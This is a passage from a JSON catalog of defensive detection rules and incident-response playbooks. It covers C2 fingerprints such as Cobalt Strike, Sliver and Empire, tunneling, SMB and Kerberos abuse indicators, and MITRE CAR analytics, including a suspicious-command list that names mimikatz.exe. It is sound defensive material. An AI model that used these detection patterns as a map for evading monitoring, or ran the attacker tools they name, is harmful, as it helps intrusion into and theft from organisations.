Triggers on the network signal described by 'Self-Signed Certificate Presented On Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-self-signed-egress.yaml" }, { "id": "det-network-050", "type": "detection", "name": "TLS Negotiated Weak Cipher Suite", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'TLS Negotiated Weak Cipher Suite'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1600.001" ], "log_source": "proxy", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tls-suspicious-cipher.yaml" }, { "id": "det-network-051", "type": "detection", "name": "JARM Fingerprint Matches Known Cobalt Strike Profile", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'JARM Fingerprint Matches Known Cobalt Strike Profile'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-jarm-cobalt-strike.yaml" }, { "id": "det-network-052", "type": "detection", "name": "JARM Fingerprint Matches Known Sliver Profile", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'JARM Fingerprint Matches Known Sliver Profile'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-jarm-sliver.yaml" }, { "id": "det-network-053", "type": "detection", "name": "HTTP Response MIME And Content-Encoding Mismatch", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'HTTP Response MIME And Content-Encoding Mismatch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1027" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-gzip-mime-mismatch.yaml" }, { "id": "det-network-054", "type": "detection", "name": "Large HTTP POST From Workstation To Public IP", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Large HTTP POST From Workstation To Public IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1041" ], "log_source": "proxy", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-http-large-post-from-workstation.yaml" }, { "id": "det-network-055", "type": "detection", "name": "Outbound SSH With -R Reverse-Tunnel Flag", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Outbound SSH With -R Reverse-Tunnel Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ssh-reverse-tunnel.yaml" }, { "id": "det-network-056", "type": "detection", "name": "Tor Connection From Corporate Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Tor Connection From Corporate Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tor-egress-corp.yaml" }, { "id": "det-network-057", "type": "detection", "name": "ICMP Echo With Unusually Large Payload", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Echo With Unusually Large Payload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-icmp-large-payload.yaml" }, { "id": "det-network-058", "type": "detection", "name": "GRE Tunnel Initiated By Non-Network Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'GRE Tunnel Initiated By Non-Network Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-gre-from-non-network-device.yaml" }, { "id": "det-network-059", "type": "detection", "name": "WireGuard Handshake From User Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WireGuard Handshake From User Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-wireguard-handshake-from-user.yaml" }, { "id": "det-network-060", "type": "detection", "name": "Corporate VPN Login Originating From Datacenter ASN", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Corporate VPN Login Originating From Datacenter ASN'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1078.004" ], "log_source": "vpn", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-vpn-from-datacenter.yaml" }, { "id": "det-network-061", "type": "detection", "name": "Tor Introduction To Hidden Service From Corp Host", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Tor Introduction To Hidden Service From Corp Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1090.003" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-tor-introduction-onion.yaml" }, { "id": "det-network-062", "type": "detection", "name": "Cloudflared Tunnel Started From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Cloudflared Tunnel Started From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1572" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-cloudflared-tunnel-egress.yaml" }, { "id": "det-network-063", "type": "detection", "name": "SMB Version 1 Negotiated In Network Flow", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Version 1 Negotiated In Network Flow'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.002" ], "log_source": "firewall", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smbv1-egress.yaml" }, { "id": "det-network-064", "type": "detection", "name": "SMB Write To NETLOGON Share", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Write To NETLOGON Share'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1570" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smb-write-netlogon.yaml" }, { "id": "det-network-065", "type": "detection", "name": "SMB Write To SYSVOL Share From Non-DC", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'SMB Write To SYSVOL Share From Non-DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1570" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-smb-write-sysvol.yaml" }, { "id": "det-network-066", "type": "detection", "name": "NTLM Relay Indicator (Same Challenge Reused Across Hosts)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'NTLM Relay Indicator (Same Challenge Reused Across Hosts)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "firewall", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ntlm-relay-pattern.yaml" }, { "id": "det-network-067", "type": "detection", "name": "RPC Remote Registry Write From Workstation Subnet", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RPC Remote Registry Write From Workstation Subnet'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1112" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-rpc-remote-registry.yaml" }, { "id": "det-network-068", "type": "detection", "name": "RPC Task Scheduler Create From Workstation", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RPC Task Scheduler Create From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1053.005" ], "log_source": "firewall", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-rpc-task-scheduler-remote.yaml" }, { "id": "det-network-069", "type": "detection", "name": "WinRM HTTPS From Workstation To DC", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'WinRM HTTPS From Workstation To DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1021.006" ], "log_source": "firewall", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-winrm-ssl-from-workstation.yaml" }, { "id": "det-network-070", "type": "detection", "name": "Cobalt Strike Default Named Pipe Pattern", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Cobalt Strike Default Named Pipe Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573.002" ], "log_source": "firewall", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-cobalt-strike-named-pipe.yaml" }, { "id": "det-network-071", "type": "detection", "name": "Sliver Default Named Pipe Pattern", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Sliver Default Named Pipe Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1573" ], "log_source": "firewall", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-sliver-named-pipe.yaml" }, { "id": "det-network-072", "type": "detection", "name": "Empire C2 Default URI Pattern Observed", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Empire C2 Default URI Pattern Observed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "network", "mitre_techniques": [ "T1071.001" ], "log_source": "proxy", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-empire-default-uri.yaml" }, { "id": "det-network-073", "type": "detection", "name": "Kerberos Service Ticket Issued With RC4 Encryption", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Service Ticket Issued With RC4 Encryption'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1558.003" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-kerberos-rc4-ticket.yaml" }, { "id": "det-network-074", "type": "detection", "name": "Kerberos Account With Pre-Auth Disabled Used", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'Kerberos Account With Pre-Auth Disabled Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-kerberos-pre-auth-disabled.yaml" }, { "id": "det-network-075", "type": "detection", "name": "RADIUS Authentication Used PAP (Cleartext Password)", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'RADIUS Authentication Used PAP (Cleartext Password)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1110" ], "log_source": "radius", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-radius-pap-clear.yaml" }, { "id": "det-network-076", "type": "detection", "name": "LDAP Signing Disabled On Domain Controller", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Signing Disabled On Domain Controller'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1557.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ldap-signing-disabled.yaml" }, { "id": "det-network-077", "type": "detection", "name": "LDAP Search Pattern Matches BloodHound Collection", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'LDAP Search Pattern Matches BloodHound Collection'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-ldap-bloodhound-pattern.yaml" }, { "id": "det-network-078", "type": "detection", "name": "ICMP Echo With High-Entropy Payload", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'ICMP Echo With High-Entropy Payload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1095" ], "log_source": "firewall", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-icmp-high-entropy-payload.yaml" }, { "id": "det-network-079", "type": "detection", "name": "DHCP Starvation: Rapid Lease Churn From Single MAC Range", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'DHCP Starvation: Rapid Lease Churn From Single MAC Range'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "network", "mitre_techniques": [ "T1498" ], "log_source": "firewall", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-dhcp-starvation.yaml" }, { "id": "det-network-080", "type": "detection", "name": "STP Topology Change Advertised By Edge Port", "description": "AiSOC v1 curated detection. Triggers on the network signal described by 'STP Topology Change Advertised By Edge Port'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "network", "mitre_techniques": [ "T1498" ], "log_source": "switch", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/network/net-stp-topology-change-from-edge.yaml" }, { "id": "dlp-violation-response-v1", "type": "detection", "name": "DLP Policy Violation Response", "description": "Responds to data loss prevention (DLP) policy violations including unauthorized data transfers, sensitive document uploads to personal storage, or PII/PHI exfiltration attempts. Blocks the transfer, notifies compliance, and preserves audit evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "dlp", "data-loss-prevention", "compliance", "pii", "phi", "exfiltration" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/dlp-violation-response.yaml" }, { "id": "host-containment-response-v1", "type": "detection", "name": "Host Containment Response", "description": "General-purpose host containment playbook for any threat requiring immediate endpoint isolation. Performs pre-isolation forensic collection, isolates the host, notifies the IR team, and starts the investigation workflow.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "containment", "endpoint", "isolation", "edr", "incident-response" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/host-containment-response.yaml" }, { "id": "iam-key-compromise-response-v1", "type": "detection", "name": "IAM Key Compromise Response", "description": "Responds to compromised IAM access keys including keys exposed in public repositories, leaked in logs, or used from unexpected geolocations. Immediately disables the key, audits recent API usage, and rotates credentials.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "iam", "aws", "cloud", "key-compromise", "credential-leak" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/iam-key-compromise-response.yaml" }, { "id": "ids-alert-response-v1", "type": "detection", "name": "IDS/IPS Alert Response", "description": "Responds to Intrusion Detection/Prevention System alerts including network scans, exploitation attempts, and protocol anomalies. Blocks the attacking source, captures PCAP evidence, and notifies the network security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ids", "ips", "network", "intrusion-detection", "nids" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/ids-alert-response.yaml" }, { "id": "insider-threat-response-v1", "type": "detection", "name": "Insider Threat Response", "description": "Responds to suspected insider threat activity including unauthorized data access, bulk downloads, privilege abuse, or off-hours anomalous activity. Escalates to HR and Legal with full audit trail.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "insider-threat", "dlp", "ueba", "identity", "data-exfiltration" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/insider-threat-response.yaml" }, { "id": "iso-27001-violation-response-v1", "type": "detection", "name": "ISO 27001 Control Violation Response", "description": "Responds to ISO 27001 information security control violations including unauthorized access to sensitive information, policy breaches, and audit findings. Creates compliance records, notifies the CISO, and initiates corrective action procedures.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "iso27001", "compliance", "governance", "policy-violation", "audit" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/iso-27001-violation-response.yaml" }, { "id": "lateral-movement-response-v1", "type": "detection", "name": "Lateral Movement Response", "description": "Responds to detected lateral movement activity including pass-the-hash, pass-the-ticket, remote service abuse, and admin share enumeration. Isolates affected hosts, revokes lateral credentials, and maps the blast radius.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "lateral-movement", "endpoint", "network", "credential-abuse", "active-directory" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/lateral-movement-response.yaml" }, { "id": "malware-detection-response-v1", "type": "detection", "name": "Malware Detection Response", "description": "Responds to malware detections across endpoints. Quarantines the malicious file, isolates the host if needed, runs deep scan, and notifies the IR team. Supports trojan, spyware, adware, worm, and backdoor classifications.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "malware", "endpoint", "edr", "antivirus", "containment" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/malware-detection-response.yaml" }, { "id": "mfa-fatigue-response-v1", "type": "detection", "name": "MFA Fatigue Attack Response", "description": "Responds to MFA push fatigue attacks where attackers spam authentication requests hoping the user accidentally approves. Detects rapid successive MFA prompts, temporarily blocks push notifications, and forces re-enrollment.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "mfa-fatigue", "identity", "authentication", "push-bombing", "account-takeover" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/mfa-fatigue-response.yaml" }, { "id": "mitre-car-car-2013-01-003", "type": "detection", "name": "SMB Events Monitoring", "description": "[Server Message Block](https://en.wikipedia.org/wiki/Server_Message Block) (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.\n\n### Output Description\n\nThe source, destination, content, and time of each event.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1039", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-01-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-01-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-01-003.yaml" } }, { "id": "mitre-car-car-2013-02-003", "type": "detection", "name": "Processes Spawning cmd.exe", "description": "The Windows [Command Prompt](https://en.wikipedia.org/wiki/cmd.exe) (`cmd.exe`) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as `dir`, `copy`, `mkdir`, and `type`, as well as batch scripts (`.bat`). Typically, when a user runs a command prompt, the parent process is `explorer.exe` or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process `cmd.exe` from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of `cmd.exe`, it may be possible to detect adversaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-02-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-02-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-02-003.yaml" } }, { "id": "mitre-car-car-2013-02-008", "type": "detection", "name": "Simultaneous Logins on a Host", "description": "Multiple users logged into a single machine at the same time, or even within the same hour, do not typically occur in networks we have observed.\n\nLogon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista.\nLogon types 2, 3, 9 and 10 are of interest. For more details see the Logon Types table on Microsoft's [Audit Logon Events](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc787567(v=ws.10)) page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-02-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-02-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-02-008.yaml" } }, { "id": "mitre-car-car-2013-03-001", "type": "detection", "name": "Reg.exe called from Command Shell", "description": "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via `regedit.exe` or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility `reg.exe` provides a [command-line interface](https://en.wikipedia.org/wiki/Command-line_interface) to the registry, so that queries and modifications can be performed from a shell, such as `cmd.exe`. When a user is responsible for these actions, the parent of `cmd.exe` will likely be `explorer.exe`. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly.\n\n### Output Description\n\nThe sequence of processes that resulted in `reg.exe` being started from a shell. That is, a hierarchy that looks like\n\n- `great-grand_parent.exe`\n- `grand_parent.exe`\n- `parent.exe`\n- `reg.exe`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1012", "T1112", "T1547", "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-03-001.yaml" } }, { "id": "mitre-car-car-2013-04-002", "type": "detection", "name": "Quick execution of a series of suspicious commands", "description": "Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.\n\n Commands of interest:\n\n- arp.exe\n- at.exe\n- attrib.exe\n- cscript.exe\n- dsquery.exe\n- hostname.exe\n- ipconfig.exe\n- mimikatz.exe\n- nbstat.exe\n- net.exe\n- netsh.exe\n- nslookup.exe\n- ping.exe\n- quser.exe\n- qwinsta.exe\n- reg.exe\n- runas.exe\n- sc.exe\n- schtasks.exe\n- ssh.exe\n- systeminfo.exe\n- taskkill.exe\n- telnet.exe\n- tracert.exe\n- wscript.exe\n- xcopy.exe\n\n### Output Description\n\nThe host on which the commands were executed, the time of execution, and what commands were executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087", "T1003", "T1069", "T1057", "T1021", "T1543", "T1112", "T1574", "T1018", "T1569", "T1053", "T1029", "T1033", "T1007", "T1082", "T1049", "T1016", "T1010", "T1518", "T1046", "T1562", "T1098", "T1059", "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-04-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-04-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-04-002.yaml" } }, { "id": "mitre-car-car-2013-05-002", "type": "detection", "name": "Suspicious Run Locations", "description": "In Windows, files should never execute out of certain directory locations. Any of these locations may exist for a variety of reasons, and executables may be present in the directory but should not execute. As a result, some defenders make the mistake of ignoring these directories and assuming that a process will never run from one. There are known TTPs that have taken advantage of this fact to go undetected. This fact should inform defenders to monitor these directories more closely, knowing that they should never contain running processes.\n\nMonitors the directories\n\n- `*:\\RECYCLER`\n- `*:\\SystemVolumeInformation`\n- `%systemroot%\\Tasks`\n- `%systemroot%\\debug`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2013-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2013-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2013-05-002.yaml" } }, { "id": "mitre-car-car-2013-05-003", "type": "detection", "name": "SMB Write Request", "description": "As described in [CAR-2013-01-003](../CAR-2013-01-003), SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in [Exfiltration](https://attack.mitre.org/tactics/TA0010) or as a 